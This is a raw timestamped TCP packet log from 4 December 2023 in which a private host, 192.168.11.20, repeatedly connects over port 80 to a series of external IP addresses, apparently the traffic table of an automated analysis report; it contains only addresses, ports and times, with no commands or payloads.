                                                                                                                              Dec 4, 2023 15:25:10.950664997 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:11.132544041 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.132718086 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.132797956 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.132857084 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.132914066 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814075947 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814116001 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814156055 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814183950 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:43.814198971 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814244032 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:43.814246893 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.814440966 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:43.829004049 CET805018076.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:43.829246998 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:45.208415985 CET5018080192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.224150896 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.318927050 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.319103003 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.319391012 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.414114952 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.426790953 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.426857948 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.426902056 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.426942110 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.426980972 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.427020073 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.427062035 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.427107096 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.427114964 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.427216053 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.427433014 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:46.440654993 CET805018176.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:46.440833092 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:47.832941055 CET5018180192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:48.848481894 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:48.943392992 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:48.943602085 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:48.944977999 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:48.945070982 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.040302992 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.040579081 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.040803909 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.040884972 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.040930033 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.040968895 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041009903 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041023970 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.041085005 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041152000 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041199923 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041239977 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.041245937 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.041568995 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.041738033 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.052531004 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052640915 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052695036 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052743912 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052813053 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052876949 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052920103 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.052964926 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.053067923 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.053419113 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.065685987 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.065916061 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.137108088 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137181044 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137252092 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137300014 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137399912 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.137466908 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137496948 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.137561083 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:49.137677908 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137734890 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137799978 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.137959957 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.138401985 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.232652903 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.232748032 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.232872009 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.233241081 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.233308077 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:49.233437061 CET805018276.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:50.457417965 CET5018280192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.472860098 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.567593098 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.567815065 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.567981958 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.669775963 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683687925 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683716059 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683738947 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683772087 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683794022 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683818102 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.683986902 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.684015989 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.684039116 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.684078932 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.684464931 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.684560061 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.696722984 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:51.696993113 CET5018380192.168.11.2076.76.21.142
                                                                                                                              Dec 4, 2023 15:25:51.779362917 CET805018376.76.21.142192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:59.736912012 CET5018480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:25:59.909193039 CET805018454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:59.909482002 CET5018480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:25:59.909645081 CET5018480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:26:00.128617048 CET805018454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:02.051954031 CET805018454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:02.052027941 CET805018454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:02.052365065 CET5018480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:26:02.052365065 CET5018480192.168.11.2054.36.145.173
                                                                                                                              Dec 4, 2023 15:26:02.224736929 CET805018454.36.145.173192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:15.280255079 CET5018580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:15.404048920 CET805018574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:15.404314995 CET5018580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:15.404470921 CET5018580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:15.527930021 CET805018574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:15.535440922 CET805018574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:15.535646915 CET805018574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:15.536035061 CET5018580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:16.904596090 CET5018580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:17.920152903 CET5018680192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:18.043874025 CET805018674.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:18.044146061 CET5018680192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:18.044367075 CET5018680192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:18.167748928 CET805018674.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:18.172804117 CET805018674.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:18.172823906 CET805018674.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:18.172971010 CET5018680192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:19.544668913 CET5018680192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.560322046 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.684868097 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.685237885 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.686492920 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.686585903 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.810899019 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.810976028 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811038971 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811073065 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.811083078 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811235905 CET5018780192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:26:20.811258078 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811335087 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:20.811376095 CET805018774.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:44.982419014 CET5019280192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:44.982669115 CET5019280192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:44.982901096 CET5019280192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:45.092437983 CET8050192216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:49.991477966 CET5019380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:50.161050081 CET805019337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:50.161274910 CET5019380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:50.161400080 CET5019380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:50.330929041 CET805019337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:50.331135988 CET5019380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:51.662755966 CET5019380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:52.678256989 CET5019480192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:52.856393099 CET805019437.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:52.856672049 CET5019480192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:52.856779099 CET5019480192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:53.034671068 CET805019437.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:53.034928083 CET5019480192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:54.365257025 CET5019480192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.380753040 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.550035954 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.550198078 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.551474094 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.551522970 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.551574945 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.720957041 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721024036 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721067905 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721137047 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.721157074 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721262932 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721295118 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.721323967 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721411943 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721460104 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721467018 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.721467018 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.721561909 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721605062 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721657991 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.891239882 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.891298056 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.891340017 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.891380072 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.891417980 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.067821026 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.245980024 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.246184111 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.246385098 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.425792933 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.425908089 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.425975084 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426069021 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426162958 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426178932 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.426285982 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.426291943 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426373005 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426434040 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426444054 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.426517963 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426577091 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426611900 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.426887035 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.604487896 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.604677916 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.604759932 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.604837894 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.604891062 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605000973 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605055094 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605079889 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605163097 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605221033 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605278969 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605288982 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605365038 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605402946 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605447054 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605509996 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605565071 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605618954 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605649948 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605696917 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605765104 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605819941 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605845928 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605906963 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605971098 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.606000900 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.606053114 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.606065989 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.606225014 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.783751965 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.783819914 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.783850908 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.783885002 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784065008 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784075975 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.784110069 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784233093 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784267902 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784398079 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.784425974 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784476995 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784657955 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784706116 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784734011 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784749031 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.784862995 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784890890 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.785007954 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785037041 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785073996 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.785079956 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785130024 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785159111 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785185099 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785212040 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785228968 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.785540104 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.785630941 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.963464022 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:03.800820112 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:03.917632103 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:03.917838097 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:03.918009043 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:04.034866095 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168114901 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168199062 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168237925 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168275118 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168311119 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168340921 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168371916 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168378115 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:04.168488979 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:04.168557882 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:05.425473928 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:06.440809011 CET5019880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:06.558306932 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.558509111 CET5019880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:06.558710098 CET5019880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:06.675407887 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.802052021 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:39.102727890 CET8050208198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:39.102973938 CET5020880192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:39.102973938 CET5020880192.168.11.20198.252.98.64
                                                                                                                              Dec 4, 2023 15:27:39.269068956 CET8050208198.252.98.64192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:44.104540110 CET5020980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:44.286956072 CET805020991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:44.287201881 CET5020980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:44.287436008 CET5020980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:44.470504999 CET805020991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:44.470577002 CET805020991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:44.470788002 CET5020980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:45.791460037 CET5020980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:46.807050943 CET5021080192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:46.989248037 CET805021091.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:46.989525080 CET5021080192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:46.989672899 CET5021080192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:47.172646046 CET805021091.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:47.172689915 CET805021091.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:47.172919035 CET5021080192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:48.493994951 CET5021080192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.509608984 CET5021180192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:27:49.692255974 CET805021191.195.240.117192.168.11.20
